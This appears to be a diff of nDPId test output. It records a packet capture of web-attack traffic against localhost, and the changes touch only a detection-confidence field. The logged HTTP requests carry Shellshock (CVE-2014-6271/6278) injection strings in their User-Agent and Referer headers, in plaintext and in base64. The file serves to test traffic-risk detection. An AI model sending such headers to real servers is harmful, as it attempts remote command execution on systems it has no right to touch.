00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1576420277420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277420,"pkt":"AAAAAAAAAAAAAAAACABFAAEJZRVAAEAG1td\/AAABfwAAAcU6H5C6AV3ZPf\/xToAYAED+\/QAAAQEICp1m\/dSdZv3UR0VUIC9pbmZvLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1576420277422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277422,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0gtAAEAGaeJ\/AAABfwAAAcU8H5DcN+rDzEDc2oAYAED+\/AAAAQEICp1m\/dadZv3WR0VUIC9pbmZvLnNoIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1576420277423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277423,"pkt":"AAAAAAAAAAAAAAAACABFAAENVqhAAEAG5UB\/AAABfwAAAcU+H5CeOW5utt+cAoAYAED\/AQAAAQEICp1m\/dedZv3XR0VUIC9sb2FkcGFnZS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/loadpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/loadpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1576420277425,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277425,"pkt":"AAAAAAAAAAAAAAAACABFAAEKJkVAAEAGFad\/AAABfwAAAcVAH5DPeB6QOQhEGoAYAED+\/gAAAQEICp1m\/didZv3YR0VUIC9sb2dpbi5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1576420277426,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277426,"pkt":"AAAAAAAAAAAAAAAACABFAAEKG0lAAEAGIKN\/AAABfwAAAcVCH5Dr2SOM+8VpkIAYAED+\/gAAAQEICp1m\/dqdZv3aR0VUIC9sb2dpbi5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1576420277428,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277428,"pkt":"AAAAAAAAAAAAAAAACABFAAEJsHVAAEAGi3d\/AAABfwAAAcVEH5DgV4i\/xF\/y64AYAED+\/QAAAQEICp1m\/dydZv3cR0VUIC9sb2dpbi5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1576420277429,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277429,"pkt":"AAAAAAAAAAAAAAAACABFAAEMTIBAAEAG72l\/AAABfwAAAcVGH5AiwXS0u+SpZoAYAED\/AAAAAQEICp1m\/d2dZv3dR0VUIC9wYXRodGVzdC5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pathtest.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pathtest.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7580000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 